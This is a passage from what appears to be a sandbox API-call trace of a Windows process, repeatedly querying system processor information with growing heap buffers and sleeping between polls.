[0276.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0276.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0276.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0276.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0276.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0276.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0276.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0276.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.519] Sleep (dwMilliseconds=0x110) [0276.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0276.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0276.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0276.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0276.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0276.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0276.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0276.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0276.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.568] Sleep (dwMilliseconds=0x110) [0276.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0276.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0276.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0276.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0276.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0276.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0276.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0276.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0276.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.582] Sleep (dwMilliseconds=0x110) [0276.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0276.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0276.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0276.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0276.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0276.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0276.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0276.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0276.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.599] Sleep (dwMilliseconds=0x110) [0276.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0276.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0276.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0276.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0276.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0276.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0276.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0276.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0276.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.616] Sleep (dwMilliseconds=0x110) [0276.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0276.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0276.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0276.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0276.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0276.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0276.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0276.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0276.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.693] Sleep (dwMilliseconds=0x110) [0276.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0276.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0276.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0276.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0276.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0276.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0276.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0276.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0276.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.710] Sleep (dwMilliseconds=0x110) [0276.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0276.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0276.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0276.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0276.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0276.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0276.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0276.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0276.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.719] Sleep (dwMilliseconds=0x110) [0276.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0276.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0276.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0276.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0276.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0276.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0276.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0276.741] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0276.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.742] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.742] Sleep (dwMilliseconds=0x110) [0276.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0276.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0276.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0276.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0276.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0276.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0276.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0276.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0276.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.754] Sleep (dwMilliseconds=0x110) [0276.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0276.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0276.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0276.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0276.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0276.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0276.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0276.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0276.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.773] Sleep (dwMilliseconds=0x110) [0276.854] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0276.854] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.854] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0276.854] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0276.854] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.855] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0276.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0276.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0276.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0276.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0276.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.860] Sleep (dwMilliseconds=0x110) [0276.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0276.880] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0276.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0276.881] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0276.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0276.881] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0276.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0276.882] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.882] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0276.882] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.883] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.883] Sleep (dwMilliseconds=0x110) [0276.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0276.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0276.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0276.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0276.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0276.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0276.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0276.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0276.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.893] Sleep (dwMilliseconds=0x110) [0276.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0276.905] 